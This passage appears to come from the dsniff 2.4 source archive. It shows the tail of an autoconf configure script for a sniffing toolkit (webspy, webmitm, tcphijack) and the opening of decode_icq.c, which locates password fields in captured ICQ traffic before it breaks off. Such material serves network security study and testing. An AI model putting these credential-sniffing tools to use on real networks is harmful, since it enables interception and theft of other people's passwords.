yes"; then echo "$ac_t""yes" 1>&6 ac_tr_lib=HAVE_LIB`echo nsl | sed -e 's/[^a-zA-Z0-9_]/_/g' \ -e 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/'` cat >> confdefs.h <&6 fi echo $ac_n "checking for dn_expand in -lresolv""... $ac_c" 1>&6 echo "configure:2625: checking for dn_expand in -lresolv" >&5 ac_lib_var=`echo resolv'_'dn_expand | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-lresolv $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if eval "test \"`echo '$ac_cv_lib_'$ac_lib_var`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_lib=HAVE_LIB`echo resolv | sed -e 's/[^a-zA-Z0-9_]/_/g' \ -e 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/'` cat >> confdefs.h <&6 fi for ac_func in dirname strlcpy strlcat strsep do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:2674: checking for $ac_func" >&5 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char $ac_func(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_$ac_func) || defined (__stub___$ac_func) choke me #else $ac_func(); #endif ; return 0; } EOF if { (eval echo configure:2702: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_$ac_func=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_$ac_func=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'$ac_func`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_func=HAVE_`echo $ac_func | tr 'abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` cat >> confdefs.h <&6 LIBOBJS="$LIBOBJS ${ac_func}.${ac_objext}" fi done needmd5=no for ac_func in MD5Update do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:2732: checking for $ac_func" >&5 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char $ac_func(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_$ac_func) || defined (__stub___$ac_func) choke me #else $ac_func(); #endif ; return 0; } EOF if { (eval echo configure:2760: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_$ac_func=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_$ac_func=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'$ac_func`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_func=HAVE_`echo $ac_func | tr 'abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` cat >> confdefs.h <&6 needmd5=yes fi done if test $needmd5 = yes; then LIBOBJS="$LIBOBJS md5.o" fi neederr=no for ac_func in warnx do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:2792: checking for $ac_func" >&5 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char $ac_func(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_$ac_func) || defined (__stub___$ac_func) choke me #else $ac_func(); #endif ; return 0; } EOF if { (eval echo configure:2820: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_$ac_func=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_$ac_func=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'$ac_func`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_func=HAVE_`echo $ac_func | tr 'abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` cat >> confdefs.h <&6 neederr=yes fi done if test $neederr = yes; then LIBOBJS="$LIBOBJS err.o" fi needethers=no for ac_func in ether_ntoa do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:2852: checking for $ac_func" >&5 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.$ac_ext < /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char $ac_func(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_$ac_func) || defined (__stub___$ac_func) choke me #else $ac_func(); #endif ; return 0; } EOF if { (eval echo configure:2880: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_func_$ac_func=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_func_$ac_func=no" fi rm -f conftest* fi if eval "test \"`echo '$ac_cv_func_'$ac_func`\" = yes"; then echo "$ac_t""yes" 1>&6 ac_tr_func=HAVE_`echo $ac_func | tr 'abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` cat >> confdefs.h <&6 needethers=yes fi done if test $needethers = yes; then LIBOBJS="$LIBOBJS ethers.o" fi if test "x$no_x" = "x"; then WEBSPY="webspy"; fi echo $ac_n "checking for Berkeley DB with 1.85 compatibility""... $ac_c" 1>&6 echo "configure:2916: checking for Berkeley DB with 1.85 compatibility" >&5 # Check whether --with-db or --without-db was given. if test "${with_db+set}" = set; then withval="$with_db" case "$withval" in yes|no) echo "$ac_t""no" 1>&6 ;; *) echo "$ac_t""$withval" 1>&6 if test -f $withval/build_unix/db_185.h -a \ -f $withval/build_unix/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBINC="-I$withval/build_unix" DBLIB="-L$withval/build_unix -ldb" elif test -f $withval/dist/db_185.h -a \ -f $withval/dist/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBINC="-I$withval/dist" DBLIB="-L$withval/dist -ldb" elif test -f $withval/include/db_185.h -a \ -f $withval/lib/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBINC="-I$withval/include" DBLIB="-L$withval/lib -ldb" else { echo "configure: error: db_185.h or libdb.a not found in $withval or not configured with --enable-compat185" 1>&2; exit 1; } fi ;; esac else for dir in ${prefix}/BerkeleyDB.3.1 ${prefix}/BerkeleyDB.3.0 \ ${prefix}/BerkeleyDB ${prefix}/db ${prefix}; do if test -f ${dir}/include/db_185.h; then cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break elif test -f ${dir}/include/db.h; then cat >> confdefs.h <<\EOF #define HAVE_DB_H 1 EOF DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break fi done if test "x$have_db" = "x"; then if test -f /usr/include/db2/db_185.h; then cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBINC="-I/usr/include/db2" DBLIB="-ldb2" have_db=yes elif test -f /usr/include/db_185.h; then cat >> confdefs.h <<\EOF #define HAVE_DB_185_H 1 EOF DBLIB="-ldb" have_db=yes elif test -f /usr/include/db.h; then cat >> confdefs.h <<\EOF #define HAVE_DB_H 1 EOF have_db=yes fi fi if test "x$have_db" = "x"; then { echo "configure: error: Berkeley DB with 1.85 compatibility not found" 1>&2; exit 1; } fi echo "$ac_t""yes" 1>&6 fi echo $ac_n "checking for libpcap""... $ac_c" 1>&6 echo "configure:3019: checking for libpcap" >&5 # Check whether --with-libpcap or --without-libpcap was given. if test "${with_libpcap+set}" = set; then withval="$with_libpcap" case "$withval" in yes|no) echo "$ac_t""no" 1>&6 ;; *) echo "$ac_t""$withval" 1>&6 if test -f $withval/pcap.h -a -f $withval/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval -I$withval/bpf" PCAPLIB="-L$withval -lpcap" elif test -f $withval/include/pcap.h -a \ -f $withval/include/net/bpf.h -a \ -f $withval/lib/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval/include" PCAPLIB="-L$withval/lib -lpcap" else { echo "configure: error: pcap.h" 1>&2; exit 1; } fi ;; esac else if test -f ${prefix}/include/pcap.h; then PCAPINC="-I${prefix}/include" PCAPLIB="-L${prefix}/lib -lpcap" elif test -f /usr/include/pcap/pcap.h; then PCAPINC="-I/usr/include/pcap" PCAPLIB="-lpcap" elif test -f /usr/include/pcap.h; then PCAPLIB="-lpcap" else echo "$ac_t""no" 1>&6 { echo "configure: error: libpcap not found" 1>&2; exit 1; } fi echo "$ac_t""yes" 1>&6 fi echo $ac_n "checking for libnet""... $ac_c" 1>&6 echo "configure:3067: checking for libnet" >&5 # Check whether --with-libnet or --without-libnet was given. if test "${with_libnet+set}" = set; then withval="$with_libnet" case "$withval" in yes|no) echo "$ac_t""no" 1>&6 ;; *) echo "$ac_t""$withval" 1>&6 if test -f $withval/include/libnet.h -a -f $withval/lib/libnet.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi if test -f $withval/bin/libnet-config; then CFLAGS="$CFLAGS `$withval/bin/libnet-config --defines`" elif test -f $withval/libnet-config; then CFLAGS="$CFLAGS `$withval/libnet-config --defines`" else CFLAGS="$CFLAGS `libnet-config --defines`" fi LNETINC="-I$withval/include" LNETLIB="-L$withval/lib -lnet" else { echo "configure: error: libnet.h or libnet.a not found in $withval" 1>&2; exit 1; } fi ;; esac else if test -f ${prefix}/include/libnet.h; then CFLAGS="$CFLAGS `${prefix}/bin/libnet-config --defines`" LNETINC="-I${prefix}/include" LNETLIB="-L${prefix}/lib -lnet" elif test -f /usr/include/libnet.h; then CFLAGS="$CFLAGS `libnet-config --defines`" LNETLIB="-lnet" else echo "$ac_t""no" 1>&6 { echo "configure: error: libnet not found" 1>&2; exit 1; } fi echo "$ac_t""yes" 1>&6 fi echo $ac_n "checking for libnids""... $ac_c" 1>&6 echo "configure:3114: checking for libnids" >&5 # Check whether --with-libnids or --without-libnids was given. if test "${with_libnids+set}" = set; then withval="$with_libnids" case "$withval" in yes|no) echo "$ac_t""no" 1>&6 ;; *) echo "$ac_t""$withval" 1>&6 if test -f $withval/src/nids.h -a -f $withval/src/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/src" NIDSLIB="-L$withval/src -lnids" elif test -f $withval/include/nids.h -a -f $withval/lib/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/include" NIDSLIB="-L$withval/lib -lnids" else { echo "configure: error: nids.h or libnids.a not found in $withval" 1>&2; exit 1; } fi ;; esac else if test -f ${prefix}/include/nids.h; then NIDSINC="-I${prefix}/include" NIDSLIB="-L${prefix}/lib -lnids" elif test -f /usr/include/nids.h; then NIDSLIB="-lnids" else echo "$ac_t""no" 1>&6 { echo "configure: error: libnids not found" 1>&2; exit 1; } fi echo "$ac_t""yes" 1>&6 fi save_cppflags="$CPPFLAGS" CPPFLAGS="$NIDSINC" echo $ac_n "checking whether libnids version is good""... $ac_c" 1>&6 echo "configure:3156: checking whether libnids version is good" >&5 cat > conftest.$ac_ext < EOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | egrep "pcap_filter" >/dev/null 2>&1; then rm -rf conftest* echo "$ac_t""yes" 1>&6 else rm -rf conftest* echo "$ac_t""no" 1>&6; { echo "configure: error: libnids version 1.13 or greater required" 1>&2; exit 1; } fi rm -f conftest* CPPFLAGS="$save_cppflags" echo $ac_n "checking for OpenSSL""... $ac_c" 1>&6 echo "configure:3177: checking for OpenSSL" >&5 # Check whether --with-openssl or --without-openssl was given. if test "${with_openssl+set}" = set; then withval="$with_openssl" case "$withval" in yes|no) echo "$ac_t""no" 1>&6 ;; *) echo "$ac_t""$withval" 1>&6 if test -f $withval/include/openssl/ssl.h -a -f $withval/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval -lssl -lcrypto" elif test -f $withval/include/openssl/ssl.h -a \ -f $withval/lib/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval/lib -lssl -lcrypto" else { echo "configure: error: ssl.h or libssl.a not found in $withval" 1>&2; exit 1; } fi WEBMITM="webmitm" ;; esac else if test -f ${prefix}/include/openssl/ssl.h; then SSLINC="-I${prefix}/include" SSLLIB="-L${prefix}/lib -lssl -lcrypto" elif test -f ${prefix}/ssl/include/openssl/ssl.h; then SSLINC="-I${prefix}/ssl/include" SSLLIB="-L${prefix}/ssl/lib -lssl -lcrypto" elif test -f /usr/include/openssl/ssl.h; then SSLLIB="-lssl -lcrypto" else echo "$ac_t""no" 1>&6 { echo "configure: error: OpenSSL not found" 1>&2; exit 1; } fi echo "$ac_t""yes" 1>&6 fi trap '' 1 2 15 cat > confcache <<\EOF # This file is a shell script that caches the results of configure # tests run on this system so they can be shared between configure # scripts and configure runs. It is not useful on other systems. # If it contains results you don't want to keep, you may remove or edit it. # # By default, configure uses ./config.cache as the cache file, # creating it if it does not exist already. You can give configure # the --cache-file=FILE option to use a different cache file; that is # what configure does when it calls configure scripts in # subdirectories, so they share the cache. # Giving --cache-file=/dev/null disables caching, for debugging configure. # config.status only pays attention to the cache file if you give it the # --recheck option to rerun configure. # EOF # The following way of writing the cache mishandles newlines in values, # but we know of no workaround that is simple, portable, and efficient. # So, don't put newlines in cache variables' values. # Ultrix sh set writes to stderr and can't be redirected directly, # and sets the high bit in the cache file unless we assign to the vars. (set) 2>&1 | case `(ac_space=' '; set | grep ac_space) 2>&1` in *ac_space=\ *) # `set' does not quote correctly, so add quotes (double-quote substitution # turns \\\\ into \\, and sed turns \\ into \). sed -n \ -e "s/'/'\\\\''/g" \ -e "s/^\\([a-zA-Z0-9_]*_cv_[a-zA-Z0-9_]*\\)=\\(.*\\)/\\1=\${\\1='\\2'}/p" ;; *) # `set' quotes correctly as required by POSIX, so do not add quotes. sed -n -e 's/^\([a-zA-Z0-9_]*_cv_[a-zA-Z0-9_]*\)=\(.*\)/\1=${\1=\2}/p' ;; esac >> confcache if cmp -s $cache_file confcache; then : else if test -w $cache_file; then echo "updating cache $cache_file" cat confcache > $cache_file else echo "not updating unwritable cache $cache_file" fi fi rm -f confcache trap 'rm -fr conftest* confdefs* core core.* *.core $ac_clean_files; exit 1' 1 2 15 test "x$prefix" = xNONE && prefix=$ac_default_prefix # Let make expand exec_prefix. test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' # Any assignment to VPATH causes Sun make to only execute # the first set of double-colon rules, so remove it if not needed. # If there is a colon in the path, we need to keep it. if test "x$srcdir" = x.; then ac_vpsub='/^[ ]*VPATH[ ]*=[^:]*$/d' fi trap 'rm -f $CONFIG_STATUS conftest*; exit 1' 1 2 15 DEFS=-DHAVE_CONFIG_H # Without the "./", some shells look in PATH for config.status. : ${CONFIG_STATUS=./config.status} echo creating $CONFIG_STATUS rm -f $CONFIG_STATUS cat > $CONFIG_STATUS </dev/null | sed 1q`: # # $0 $ac_configure_args # # Compiler output produced by configure, useful for debugging # configure, is in ./config.log if it exists. ac_cs_usage="Usage: $CONFIG_STATUS [--recheck] [--version] [--help]" for ac_option do case "\$ac_option" in -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) echo "running \${CONFIG_SHELL-/bin/sh} $0 $ac_configure_args --no-create --no-recursion" exec \${CONFIG_SHELL-/bin/sh} $0 $ac_configure_args --no-create --no-recursion ;; -version | --version | --versio | --versi | --vers | --ver | --ve | --v) echo "$CONFIG_STATUS generated by autoconf version 2.13" exit 0 ;; -help | --help | --hel | --he | --h) echo "\$ac_cs_usage"; exit 0 ;; *) echo "\$ac_cs_usage"; exit 1 ;; esac done ac_given_srcdir=$srcdir ac_given_INSTALL="$INSTALL" trap 'rm -fr `echo "Makefile config.h" | sed "s/:[^ ]*//g"` conftest*; exit 1' 1 2 15 EOF cat >> $CONFIG_STATUS < conftest.subs <<\\CEOF $ac_vpsub $extrasub s%@SHELL@%$SHELL%g s%@CFLAGS@%$CFLAGS%g s%@CPPFLAGS@%$CPPFLAGS%g s%@CXXFLAGS@%$CXXFLAGS%g s%@FFLAGS@%$FFLAGS%g s%@DEFS@%$DEFS%g s%@LDFLAGS@%$LDFLAGS%g s%@LIBS@%$LIBS%g s%@exec_prefix@%$exec_prefix%g s%@prefix@%$prefix%g s%@program_transform_name@%$program_transform_name%g s%@bindir@%$bindir%g s%@sbindir@%$sbindir%g s%@libexecdir@%$libexecdir%g s%@datadir@%$datadir%g s%@sysconfdir@%$sysconfdir%g s%@sharedstatedir@%$sharedstatedir%g s%@localstatedir@%$localstatedir%g s%@libdir@%$libdir%g s%@includedir@%$includedir%g s%@oldincludedir@%$oldincludedir%g s%@infodir@%$infodir%g s%@mandir@%$mandir%g s%@CC@%$CC%g s%@INSTALL_PROGRAM@%$INSTALL_PROGRAM%g s%@INSTALL_SCRIPT@%$INSTALL_SCRIPT%g s%@INSTALL_DATA@%$INSTALL_DATA%g s%@RANLIB@%$RANLIB%g s%@CPP@%$CPP%g s%@X_CFLAGS@%$X_CFLAGS%g s%@X_PRE_LIBS@%$X_PRE_LIBS%g s%@X_LIBS@%$X_LIBS%g s%@X_EXTRA_LIBS@%$X_EXTRA_LIBS%g s%@LIBOBJS@%$LIBOBJS%g s%@TCPHIJACK@%$TCPHIJACK%g s%@WEBSPY@%$WEBSPY%g s%@DBINC@%$DBINC%g s%@DBLIB@%$DBLIB%g s%@PCAPINC@%$PCAPINC%g s%@PCAPLIB@%$PCAPLIB%g s%@LNETINC@%$LNETINC%g s%@LNETLIB@%$LNETLIB%g s%@NIDSINC@%$NIDSINC%g s%@NIDSLIB@%$NIDSLIB%g s%@SSLINC@%$SSLINC%g s%@SSLLIB@%$SSLLIB%g CEOF EOF cat >> $CONFIG_STATUS <<\EOF # Split the substitutions into bite-sized pieces for seds with # small command number limits, like on Digital OSF/1 and HP-UX. ac_max_sed_cmds=90 # Maximum number of lines to put in a sed script. ac_file=1 # Number of current file. ac_beg=1 # First line for current file. ac_end=$ac_max_sed_cmds # Line after last line for current file. ac_more_lines=: ac_sed_cmds="" while $ac_more_lines; do if test $ac_beg -gt 1; then sed "1,${ac_beg}d; ${ac_end}q" conftest.subs > conftest.s$ac_file else sed "${ac_end}q" conftest.subs > conftest.s$ac_file fi if test ! -s conftest.s$ac_file; then ac_more_lines=false rm -f conftest.s$ac_file else if test -z "$ac_sed_cmds"; then ac_sed_cmds="sed -f conftest.s$ac_file" else ac_sed_cmds="$ac_sed_cmds | sed -f conftest.s$ac_file" fi ac_file=`expr $ac_file + 1` ac_beg=$ac_end ac_end=`expr $ac_end + $ac_max_sed_cmds` fi done if test -z "$ac_sed_cmds"; then ac_sed_cmds=cat fi EOF cat >> $CONFIG_STATUS <> $CONFIG_STATUS <<\EOF for ac_file in .. $CONFIG_FILES; do if test "x$ac_file" != x..; then # Support "outfile[:infile[:infile...]]", defaulting infile="outfile.in". case "$ac_file" in *:*) ac_file_in=`echo "$ac_file"|sed 's%[^:]*:%%'` ac_file=`echo "$ac_file"|sed 's%:.*%%'` ;; *) ac_file_in="${ac_file}.in" ;; esac # Adjust a relative srcdir, top_srcdir, and INSTALL for subdirectories. # Remove last slash and all that follows it. Not all systems have dirname. ac_dir=`echo $ac_file|sed 's%/[^/][^/]*$%%'` if test "$ac_dir" != "$ac_file" && test "$ac_dir" != .; then # The file is in a subdirectory. test ! -d "$ac_dir" && mkdir "$ac_dir" ac_dir_suffix="/`echo $ac_dir|sed 's%^\./%%'`" # A "../" for each directory in $ac_dir_suffix. ac_dots=`echo $ac_dir_suffix|sed 's%/[^/]*%../%g'` else ac_dir_suffix= ac_dots= fi case "$ac_given_srcdir" in .) srcdir=. if test -z "$ac_dots"; then top_srcdir=. else top_srcdir=`echo $ac_dots|sed 's%/$%%'`; fi ;; /*) srcdir="$ac_given_srcdir$ac_dir_suffix"; top_srcdir="$ac_given_srcdir" ;; *) # Relative path. srcdir="$ac_dots$ac_given_srcdir$ac_dir_suffix" top_srcdir="$ac_dots$ac_given_srcdir" ;; esac case "$ac_given_INSTALL" in [/$]*) INSTALL="$ac_given_INSTALL" ;; *) INSTALL="$ac_dots$ac_given_INSTALL" ;; esac echo creating "$ac_file" rm -f "$ac_file" configure_input="Generated automatically from `echo $ac_file_in|sed 's%.*/%%'` by configure." case "$ac_file" in *Makefile*) ac_comsub="1i\\ # $configure_input" ;; *) ac_comsub= ;; esac ac_file_inputs=`echo $ac_file_in|sed -e "s%^%$ac_given_srcdir/%" -e "s%:% $ac_given_srcdir/%g"` sed -e "$ac_comsub s%@configure_input@%$configure_input%g s%@srcdir@%$srcdir%g s%@top_srcdir@%$top_srcdir%g s%@INSTALL@%$INSTALL%g " $ac_file_inputs | (eval "$ac_sed_cmds") > $ac_file fi; done rm -f conftest.s* # These sed commands are passed to sed as "A NAME B NAME C VALUE D", where # NAME is the cpp macro being defined and VALUE is the value it is being given. # # ac_d sets the value in "#define NAME VALUE" lines. ac_dA='s%^\([ ]*\)#\([ ]*define[ ][ ]*\)' ac_dB='\([ ][ ]*\)[^ ]*%\1#\2' ac_dC='\3' ac_dD='%g' # ac_u turns "#undef NAME" with trailing blanks into "#define NAME VALUE". ac_uA='s%^\([ ]*\)#\([ ]*\)undef\([ ][ ]*\)' ac_uB='\([ ]\)%\1#\2define\3' ac_uC=' ' ac_uD='\4%g' # ac_e turns "#undef NAME" without trailing blanks into "#define NAME VALUE". ac_eA='s%^\([ ]*\)#\([ ]*\)undef\([ ][ ]*\)' ac_eB='$%\1#\2define\3' ac_eC=' ' ac_eD='%g' if test "${CONFIG_HEADERS+set}" != set; then EOF cat >> $CONFIG_STATUS <> $CONFIG_STATUS <<\EOF fi for ac_file in .. $CONFIG_HEADERS; do if test "x$ac_file" != x..; then # Support "outfile[:infile[:infile...]]", defaulting infile="outfile.in". case "$ac_file" in *:*) ac_file_in=`echo "$ac_file"|sed 's%[^:]*:%%'` ac_file=`echo "$ac_file"|sed 's%:.*%%'` ;; *) ac_file_in="${ac_file}.in" ;; esac echo creating $ac_file rm -f conftest.frag conftest.in conftest.out ac_file_inputs=`echo $ac_file_in|sed -e "s%^%$ac_given_srcdir/%" -e "s%:% $ac_given_srcdir/%g"` cat $ac_file_inputs > conftest.in EOF # Transform confdefs.h into a sed script conftest.vals that substitutes # the proper values into config.h.in to produce config.h. And first: # Protect against being on the right side of a sed subst in config.status. # Protect against being in an unquoted here document in config.status. rm -f conftest.vals cat > conftest.hdr <<\EOF s/[\\&%]/\\&/g s%[\\$`]%\\&%g s%#define \([A-Za-z_][A-Za-z0-9_]*\) *\(.*\)%${ac_dA}\1${ac_dB}\1${ac_dC}\2${ac_dD}%gp s%ac_d%ac_u%gp s%ac_u%ac_e%gp EOF sed -n -f conftest.hdr confdefs.h > conftest.vals rm -f conftest.hdr # This sed command replaces #undef with comments. This is necessary, for # example, in the case of _POSIX_SOURCE, which is predefined and required # on some systems where configure will not decide to define it. cat >> conftest.vals <<\EOF s%^[ ]*#[ ]*undef[ ][ ]*[a-zA-Z_][a-zA-Z_0-9]*%/* & */% EOF # Break up conftest.vals because some shells have a limit on # the size of here documents, and old seds have small limits too. rm -f conftest.tail while : do ac_lines=`grep -c . conftest.vals` # grep -c gives empty output for an empty file on some AIX systems. if test -z "$ac_lines" || test "$ac_lines" -eq 0; then break; fi # Write a limited-size here document to conftest.frag. echo ' cat > conftest.frag <> $CONFIG_STATUS sed ${ac_max_here_lines}q conftest.vals >> $CONFIG_STATUS echo 'CEOF sed -f conftest.frag conftest.in > conftest.out rm -f conftest.in mv conftest.out conftest.in ' >> $CONFIG_STATUS sed 1,${ac_max_here_lines}d conftest.vals > conftest.tail rm -f conftest.vals mv conftest.tail conftest.vals done rm -f conftest.vals cat >> $CONFIG_STATUS <<\EOF rm -f conftest.frag conftest.h echo "/* $ac_file. Generated automatically by configure. */" > conftest.h cat conftest.in >> conftest.h rm -f conftest.in if cmp -s $ac_file conftest.h 2>/dev/null; then echo "$ac_file is unchanged" rm -f conftest.h else # Remove last slash and all that follows it. Not all systems have dirname. ac_dir=`echo $ac_file|sed 's%/[^/][^/]*$%%'` if test "$ac_dir" != "$ac_file" && test "$ac_dir" != .; then # The file is in a subdirectory. test ! -d "$ac_dir" && mkdir "$ac_dir" fi rm -f $ac_file mv conftest.h $ac_file fi fi; done EOF cat >> $CONFIG_STATUS <> $CONFIG_STATUS <<\EOF exit 0 EOF chmod +x $CONFIG_STATUS rm -fr confdefs* $ac_clean_files test "$no_create" = yes || ${CONFIG_SHELL-/bin/sh} $CONFIG_STATUS || exit 1 dsniff-2.4/decode_icq.c0000600000175000017500000001034307254077074014726 0ustar lucianoluciano/* * decode_icq.c * * ICQ (note - ICQ2000 is actually AIM). * * Copyright (c) 2000 Dug Song * * $Id: decode_icq.c,v 1.7 2001/03/15 08:33:00 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" #define ICQ2_UIN_OFFSET 6 #define ICQ2_CMD_OFFSET 2 #define ICQ2_PASS_OFFSET 16 #define ICQ5_UIN_OFFSET 6 #define ICQ5_CMD_OFFSET 14 #define ICQ5_CKSUM_OFFSET 20 #define ICQ5_PASS_OFFSET 34 const u_char icq5_table [] = { 0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F, 0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31, 0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A, 0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44, 0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67, 0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 